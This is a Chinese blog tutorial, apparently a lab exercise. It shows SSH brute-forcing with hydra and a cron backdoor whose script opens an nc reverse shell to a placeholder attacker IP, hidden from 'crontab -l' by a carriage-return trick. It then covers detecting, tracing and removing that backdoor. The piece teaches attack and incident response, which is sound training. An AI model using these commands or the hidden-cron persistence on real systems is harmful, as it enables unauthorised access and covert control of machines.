SSH基础简介

最新推荐文章于 2024-09-26 03:55:57 发布
最新推荐文章于 2024-09-26 03:55:57 发布
阅读量643 收藏 15
点赞数 9
文章标签: ssh 运维 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Palpitate_LL/article/details/140613397
版权

SSH简介

• Secure Shell(安全外壳协议,简称SSH)是一种加密的网络传输协议,可在不安全的网络中为网络服务提供安全的传输环境。SSH通过在网络中创建安全隧道来实现SSH客户端与服务器之间的连接。

• SSH最常见的用途是远程登录系统,人们通常利用SSH来传输命令行界面和远程执行命令。SSH使用频率最高的场合是类Unix系统,但是Windows操作系统也能有限度地使用SSH,2015年,微软宣布将在未来的操作系统中提供原生SSH协议支持,Windows10 1803版本已提供OpenSSH工具。

SSH爆破——模拟攻击

1、信息收集

• 扫描目标主机的端口:

nmap -T4 -sT 靶机ip

• 发现存在 22 ,尝试爆破ssh

2、爆破SSH

• 使用hydra爆破:

hydra -L user.txt -P password.txt ssh://靶机ip

3、SSH登录

ssh root@靶机ip

4、尝试创建隐藏计划任务

• 进入 /tmp 目录创建 task.sh 文件:

vim task.sh

#!/bin/bash

nc 攻击机ip 8888 -e /bin/bash

• 赋予执行权限:

chmod +x task.sh

• 创建脚本 create_task.sh:

vim create_task.sh

(crontab -l;printf "* * * * * /tmp/task.sh;\rno crontw-wab for `whoami`%100c\n")|crontab -

• 赋予权限,执行 create_task.sh 脚本

• crontab -l :发现没有任务,定时任务已经隐藏

• 具体任务在 /var/spool/cron/crontabs/ 下查看

• 通过 cat
/var/spool/cron/crontabs/root 查看不到任务

• 可以通过 cat -A
/var/spool/cron/crontabs/root 查看隐藏的任务

• 或者: cat -vET
/var/spool/cron/crontabs/root

【——全网最全的网络安全学习资料包分享给爱学习的你,关注我,私信回复“资料领取”获取——】
1.网络安全多个方向学习路线
2.全网最全的CTF入门学习资料
3.一线大佬实战经验分享笔记
4.网安大厂面试题合集
5.红蓝对抗实战技术秘籍
6.网络安全基础入门、Linux、web安全、渗透测试方面视频

5、尝试 nc 连接目标主机的shell

• 开启监听:

nc –lvp 8888

• 发现过了一会就反弹了目标主机的 shell

应急响应——事件排查

1、查看网络连接情况

netstat –antpl

• 发现存在异常的连接:xxx.xxx.xxx.115:8888 ESTABLISHED 2371/bash

2、查看守护进程

• 查看进程树:

pstree –p

• 查看进程:

systemctl status 2371

• 发现计划任务

3、查看计划任务

• crontab -l :未发现有计划任务,可能是隐藏的计划任务

• 查看 /var/spool/cron/crontabs 下的任务

• 使用 cat -A root 或者 cat -vET root : 可以看到隐藏内容

• 或者 vim root :直接编辑也可以看到具体任务的内容

4、找到 task.sh 文件

查看文件上传时间:

ls -l /tmp/task.sh

查看文件内容,发现是通过 nc 反弹 shell :

cat /tmp/tash.sh

应急响应——溯源分析

1、分析任务文件 task.sh

查看文件上传时间:

ls -l /tmp/task.sh

• -rwxr-xr-x 1 root root 48 1月 12 18:31 /tmp/task.sh

• 发现权限为 root ,说明攻击者以 root 账户登录,很有可能 root 账户密码被攻破

2、查看登录日志

kali 下登录成功的日志:

last -f /var/log/wtmp

kali 下登录失败的日志,发现大量登录失败的日志:

last -f /var/log/btmp

3、总结

• 爆破时间: Wed Jan 12 18:25

• 爆破账户: root、admin等,最后成功爆破出root账户的密码

• 攻击者IP:xxx.xxx.xxx.115

• 可疑IP: xxx.xxx.xxx.115 成功爆破出系统xxx.xxx.xxx.104 的 root账户的密码,并且留 crontab隐藏后门,任务执行文件 /root/task.sh

应急响应——事件处置

1、删除计划任务、结束异常进程

• 删除隐藏计划任务:

crontab -r -u root

• 杀掉恶意进程:

kill 2371

2、删除恶意文件

rm create_task.sh

rm task.sh

3、修改账户密码,关闭 root 账户远程连接的权限

• passwd root :修改密码,增强密码防护

• vim /etc/ssh/sshd_config :修改 PermitRootLogin 为 no,增强权限控制

Palpitate_LL
关注
SSH基础介绍
qq_43560395的博客
08-30 378
SSH基础介绍 基础介绍 1、什么是远程连接服务器 远程连接服务器通过文字或图形接口方式远程登录系统,让你在远程终端登录Linux主机可以获取操作主机接口 2、远程连接服务器的功能 分享主机的运算能力 3、远程连接服务器的连接 文字接口: (1)明文传输:telnet、RSH等 (2)加密传输:ssh 图形接口:XDMCP、VNC、XRDP 4、SSH(secure shell protocol,安全的壳程序协议),可以通过数据加密技术将等待传输的数据包加密后再传输到网上。 5、SSH提供的服务功能: (1
SSH框架简介
03-01
### SSH框架简介与核心知识点解析 #### 一、SSH框架概述 SSH框架是Spring、Struts2和Hibernate三个开源框架的首字母缩写,它们分别代表了Java Web开发中的三种核心技术:业务逻辑层处理(Spring)、表现层处理...
一个SSH的入门完整例子
12-15
很好的例子,记得要在applicationContext.xml配置一下数据库连接才能运行。
ssh框架入门
iteye_6145的博客
12-09 174
ssh(struts+spring+hibernate)究竟是怎么一回事?是一种规范。 先别管规范,我们从最基本的概念去理解它。java是对面向对象的编程语言,java里一切只有类,java项目的本质就是执行类的方法,类与类之间的调用。利用的其它资源就是文件,主要是xml配置文件,另外就是数据库。 jsp文件实质也是一种java类,它将被编译成Servl...
ssh 命令:全面解析ssh命令,轻松掌握远程登录与数据传输安全
最新发布
qq_38641599的博客
09-26 4076
ssh​命令用于安全登录远程主机,以便在远程机上执行命令或传输数据。​​例如登录远程主机​上的soulio示例直接参考第三章。‍了解背景知识:ssh 加密SSH 加密是保护远程连接和数据传输的关键技术,广泛应用于网络管理和安全通信。通过对称和非对称加密、密钥交换和数据完整性检查,SSH 确保了用户在使用网络时的数据安全。‍除了ssh​命令外,stfp​ 和scp​ 这两个文件传输命令也建议在 SSH 加密之上。‍。
SSH入门教程
滴水成川
06-12 2724
SSH使用指南 介绍SSH 什么 是SSH? 传统的网络服务程序,如:ftp、pop和telnet在本质上都是不安全的,因为它们在网络上用明文传送口令和数据,别有用心的人非 常容易就可以截获这些口令和数据。而且,这些服务程序的安全验证方式也是有其弱点的,就是很容易受到“中间人”(man-in-the-middle)这 种方式的攻击。所谓 “中间人”的攻击方式,就是“中间人”冒充真正的服务
SSH基础
weixin_33762321的博客
01-08 378
SSH基础 Jan.08, 2019 1. 简介 什么是SSH? "Secure Shell(安全外壳协议,简称SSH)是一种加密的网络传输协议,可在不安全的网络中为网络服务提供安全的传输环境." - Secure Shell SSH,字面意思是安全的shell,但SSH并不是一种shell,只是创建了一个通道在远程服务器上运行 shell。SSH是客户端/服务器的体系结构。一般来说,它具有下...
SSH 基础
黄三清的博客
02-12 236
什么是SSH?   传统的网络服务程序,如:ftp、pop和telnet在本质上都是不安全的,因为它们在网络上用明文传送口令和数据,别有用心的人非常容易就可以截获这些口令和数据。而且,这些服务程序的安全验证方式也是有其弱点的,就是很容易受到“中间人”(man-in-the-middle)这种方式的攻击。所谓 “中间人”的攻击方式,就是“中间人”冒充真正的服务器接收你的传给服务器的数据,然后再冒充...
SSH 框架简介
08-29
SSH 框架简介 SSH 框架是 Struts、Spring 和 Hibernate 三个框架的集成框架,是目前较流行的一种 web 应用程序开源框架。SSH 框架的系统从职责上分为四层:表示层、业务逻辑层、数据持久层和域模块层(实体层)。 ...
SSH基本介绍
向阳-Y.的博客
09-21 1427
SSH简介 SSH(Secure SHell):是一个提供数据通信安全、远程登录、远程指令执行等功能的安全网络协议 SSH协议使用TCP 22端口号,C/S架构 Server端软件:openssh Client端软件:ssh putty xshell SecureCRT SSH协议版本: SSH1:采用DES、3DES、Blowfish和RC4等对称加密算法保护数据安全传输,而对称加密算法的密钥是通过非对称加密算法(RSA)来完成交换的 SSH2:用数字签名算法(DSA)和Diffie­Hellman(DH
SSH架构简介.pdf
10-02
这个架构能够帮助开发者更专注于业务逻辑,而不是底层的基础设施,提高了开发效率和代码质量。然而,随着技术的发展,Spring Boot和Spring Cloud等现代框架已经逐渐取代了SSH,成为当前主流的Java开发选择。尽管如此...
ssh入门
runfeel
03-18 140
ssh,对于java web开发新手还是一个比较陌生的名字,在此我就简单给初窥java web门径的兄弟们简单介绍这个现在相当流行的java web开发框架。 首先,何为框架? 框架是整个或部分系统的可重用设计,表现为一组抽象构件及构件实例间交互的方法;或者说,框架是可被应用开发者定制的应用骨架。简而言之,框架即是为了方便我们程序员开发,减少代码量及增加代码质量的工具。 ...
SSH使用入门
weixin_50920579的博客
01-18 1694
再点击远程连接的图标,选择 Connect to Host in New Window,如下图。输入后会显示已连接到远程,这时选择左上角文件-打开文件夹,Hostname是你要ssh的服务器的ip地址。user是你要连接的服务器的用户名。然后点击remote里的设置。然后修改vscode对应配置。如果有端口号也要对应修改。然后输入密码可以连接了。Host可以随便写一个。打开终端创建文件夹即可。先看自己的用户名和ip。
SSH快速入门
an__jing_的博客
11-07 1452
文章目录ssh登录基本用法服务器别名ssh配置免密登录服务器之间上传下载文件复制文件复制文件夹 ssh登录 基本用法 远程登录服务器: # user:用户名 hostname:ip地址或域名 ssh user@hostname ssh user@hostname -p 22 服务器别名 修改~/.ssh/config文件,登录远程服务器可以使用别名s1, s2。下文的s1和s2都是远程服务器的别名。 Host s1 HostName ***.***.***.*** User zk
ssh服务入门
qq_42499737的博客
07-14 265
前言 上篇文章,我们主要探讨了telnet, telnet的缺点是不安全,如果你还没有学习telnet,请点击下方链接进行学习: 【Linux】循序渐进学运维-服务篇-telnet 今天我们一起来聊聊: 关于ssh服务的基本使用 1. 什么是SSH? 简单说,SSH是一种网络协议,用于计算机之间的加密登录。 最早的时候,互联网通信都是明文通信,一旦被截获,内容就暴露无疑。1995年,芬兰学者Tatu Ylonen设计了SSH协议,将登录信息全部加密,成为互联网安全的一个基本解决方案,迅速在全世界获得推广,目
SSH协议简介
06-21
SSH 为建立在应用层和传输层基础上的安全协议。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。S S H最初是U N I X系统上的一个程序...
ssh整合入门
ella
08-28 227
1,hibernate框架 -单独使用hibernate的时候,hibernate.cfg.xml 文件位置固定在src下面。 但是如果和spring进行整合的时候,没有固定位置。 ~hibernate映射配置文件(实体类和数据库表映射关系–使用orm思想) ~spring框架对hibernate框架进行封装,使用hibernateTemplate hibernateTemplate常用...
SSH基础知识(一)
Ghost_199503的博客
02-02 1187
SSH安全外壳协议(Secure Shell),它是通过在不安全的网络中创建一个加密的安全隧道,以保证安全的传输环境
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值